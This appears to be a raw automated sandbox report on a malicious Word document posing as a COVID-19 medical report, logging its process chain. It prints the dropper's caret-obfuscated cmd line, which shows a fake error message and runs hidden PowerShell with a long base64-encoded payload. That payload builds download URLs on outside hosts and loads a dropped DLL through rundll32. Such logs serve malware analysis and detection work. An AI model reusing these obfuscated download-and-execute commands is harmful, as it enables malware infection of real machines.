Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....P......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8Q................u.............}..v.....Q......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....X......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8Y................u.............}..v.....Y......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....`......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8a................u.............}..v.....a......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....h......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8i................u.............}..v.....i......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....p......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8q................u.............}..v.....q......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v.....x......0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8y................u.............}..v.....y......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{...............}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....8.................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....0.......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v............0...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................}..j....`Kj...............u.............}..v....`.......0.......................r.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v............0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......}..j....`Kj...............u.............}..v....(.......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....`.......0................Hj.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v.....^......0...............x.j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....(................u.............}..v....H.......0...............x.j.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: XP-9743 Medical report COVID-19.docVirustotal: Detection: 19%
Source: XP-9743 Medical report COVID-19.docReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
